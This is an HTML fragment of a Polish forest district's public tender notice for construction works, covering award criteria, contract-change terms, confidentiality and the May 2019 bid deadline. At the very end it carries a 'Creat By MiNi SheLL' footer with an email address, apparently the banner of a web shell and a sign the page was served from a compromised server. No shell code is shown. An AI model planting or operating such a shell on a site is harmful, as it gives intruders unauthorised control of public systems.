Wadium musi być wniesione do dnia upływu terminu składania ofert.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Długość okresu gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Samodzielna realizacja ,,kluczowych elementów (części) zamówienia"</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Strony mają prawo do przedłużenia Terminu zakończenia robót o okres trwania przyczyn, z powodu których będzie zagrożonedotrzymanie Terminu zakończenia robót, w następujących sytuacjach: a) jeżeli przyczyny, z powodu których będzie zagrożonedotrzymanie Terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, wszczególności będą następstwem nieterminowego przekazania Terenu budowy, konieczności zmian Dokumentacji projektowej wzakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie Terminu zakończenia robót, b) gdywystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z powodutechnologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagającej konkretnych warunkówatmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawcaponosi odpowiedzialność, c) gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonaniaprzedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lubopóźniają realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymiprzez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, d) wystąpią opóźnienia wdokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwemokoliczności, za które Wykonawca ponosi odpowiedzialność, e) gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń,uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczyokres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności,za które Wykonawca ponosiodpowiedzialność, f) jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczaniado ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnychod Wykonawcy, g) wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. 2.Wykonawca jest uprawniony do żądania zmiany Umowy w zakresie Materiałów, parametrów technicznych, technologiiwykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu Umowy w następujących sytuacjach: a) koniecznościzrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznychlub technologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych Wad tej Dokumentacji lubzmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziłoniewykonaniem lub nienależytym wykonaniem przedmiotu Umowy, b) konieczności realizacji robót wynikających zwprowadzenia w Dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego, wynikających zart. 36a ust. 1 PrBud, c) wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposóbistotny od przyjętych w Dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowanianiewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytymwykonaniem przedmiotu Umowy, d) wystąpienia warunków Terenu budowy odbiegających w sposób istotny od przyjętych wDokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacjilub innych obiektów budowlanych, e) konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązańtechnicznych lub materiałowych ze względu na zmiany obowiązującego prawa, f) wystąpienia niebezpieczeństwa kolizji zplanowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lubusunięcia tych kolizji, g) wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jejpostanowieniami. 3. Wykonawca jest uprawniony do żądania zmiany wynagrodzenia należnego z tytułu realizacji Umowyodpowiednio w przypadkach określonych w ust. 2. 4. Zamawiający jest uprawniony do żądania zmiany sposobu rozliczaniaUmowy lub dokonywania płatności na rzecz Wykonawcy w związku ze zmianami zawartej przez Zamawiającego umowy odofinansowanie projektu lub zmianami wytycznych dotyczących realizacji projektu. 5. Jeżeli Wykonawca uważa się zauprawnionego do przedłużenia Terminu zakończenia robót na podstawie ust. 1 , zmiany Umowy w zakresie Materiałów,parametrów technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu Umowy napodstawie ust. 2 lub zmiany wynagrodzenia na podstawie ust. 4 lub zmiany Umowy na innej podstawie wskazanej w niniejszejUmowie, zobowiązany jest do przekazania Inspektorowi nadzoru inwestorskiego wniosku dotyczącego zmiany Umowy wraz zopisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiej zmiany. 6. Wniosek, o którym mowa w ust. 5powinien zostać przekazany niezwłocznie, jednakże nie później niż w terminie 5 dni roboczych od dnia, w którym Wykonawcadowiedział się, lub powinien dowiedzieć się o danym zdarzeniu lub okolicznościach. 7. Wykonawca zobowiązany jest dodostarczenia wraz z wnioskiem, o którym mowa w ust. 5, wszelkich innych dokumentów wymaganych Umową, w tympropozycji rozliczenia i informacji uzasadniających żądanie zmiany Umowy, stosowanie do zdarzenia lub okolicznościstanowiących podstawę żądania zmiany. 8. Wykonawca zobowiązany jest do bieżącej dokumentacji koniecznej dla uzasadnieniażądania zmiany i przechowywania jej na Terenie budowy lub w innym miejscu wskazanym przez Inspektora nadzoruinwestorskiego. 9. Po otrzymaniu wniosku, o którym mowa w ust. 5 Inspektor nadzoru inwestorskiego jest uprawniony, bezdokonywania oceny jego zasadności, do kontroli dokumentacji, o której mowa w ust. 8i wydania Wykonawcy poleceniaprowadzenia dalszej dokumentacji bieżącej uzasadniającej żądanie zmiany. 10. Wykonawca jest zobowiązany do okazania dowglądu Inspektorowi nadzoru inwestorskiego dokumentacji, o której mowa w ust. 8 i przedłożenia na żądanie Inspektora nadzoruinwestorskiego jej kopii. 11. W terminie 5 dni roboczych od dnia otrzymania wniosku, o którym mowa w ust. 5 wraz zpropozycją wyceny robót i informacji uzasadniających żądanie zmiany Umowy, Inspektor nadzoru inwestorskiego zobowiązanyjest do pisemnego ustosunkowania się do zgłoszonego żądania zmiany Umowy, i odpowiednio propozycji wyceny robót, iprzekazania go Zamawiającemu wraz z uzasadnieniem, zarówno w przypadku odmowy, jak i akceptacji żądania zmiany. 12. Wterminie 3 dni roboczych od dnia otrzymania żądania zmiany, zaopiniowanego przez Inspektora nadzoru inwestorskiego,Zamawiający powiadomi Wykonawcę o akceptacji żądania zmiany Umowy i terminie podpisania aneksu do Umowy lubodpowiednio o braku akceptacji zmiany. 13. Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieliZamawiającego i Wykonawcy w formie pisemnej w drodze aneksu Umowy, pod rygorem nieważności,. 14. W razie wątpliwości,przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany: a) danych związanych z obsługą administracyjnoorganizacyjnąUmowy, b) danych teleadresowych, c) danych rejestrowych, d) będące następstwem sukcesji uniwersalnej pojednej ze stron Umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania">Jeżeli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów, art. 11 ust. 2 ustawy z dnia 16kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji (tekst jednolity: Dz. U. 2018 r., poz. 419 z późniejszymi zmianami),wówczas informacje te muszą być wyodrębnione w formie osobnego pakietu celem zachowania przez Zamawiającego tajemnicy.Pakiet ten ma być wyraźnie oznaczony ,,Tajemnice przedsiębiorstwa - nie udostępniać innym uczestnikom postępowania".Zamawiający nie ponosi odpowiedzialności za niezgodne z SIWZ przygotowanie w/w pakietu przez Wykonawcę. Stosownezastrzeżenie Wykonawca winien złożyć na formularzu ofertowym. W przeciwnym razie cała oferta zostanie ujawniona nawniosek każdej zainteresowanej osoby. Zamawiający nie ujawni informacji stanowiących tajemnicę przedsiębiorstwa wrozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania ofertzastrzegł, że nie mogą być one udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa.Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu ww. ustawy w momencie odmowy nawezwanie Zamawiającego do odtajnienia przez Wykonawcę tej części oferty, skutkować będzie odtajnieniem tej części oferty niebędącej tajemnicą przedsiębiorstwa przez Zamawiającego.</span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-05-30</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">60</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Otwarcie ofert nastąpi dnia 30.05.2019 r. o godz. 09:30 w tymczasowej siedzibie Nadleśnictwa Połczyn ul. Piwna 6, 78-320Połczyn-Zdrój (sala narad, 1 piętro) . Otwarcie ofert jest jawne. Bezpośrednio przed otwarciem ofert Zamawiający poda kwotę,jaką zamierza przeznaczyć na sfinansowanie zamówienia. Podczas otwarcia ofert Zamawiający poda nazwy i adresyWykonawców, a także informacje dotyczące cen zawartych w ofertach. Niezwłocznie po otwarciu ofert Zamawiający zamieści teinformacje na stronie internetowej. Ofertę wniesioną po terminie zwraca się po upływie terminu przewidzianego na wniesienieodwołania. Zamawiający niezwłocznie zawiadamia Wykonawcę o złożeniu oferty po terminie.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com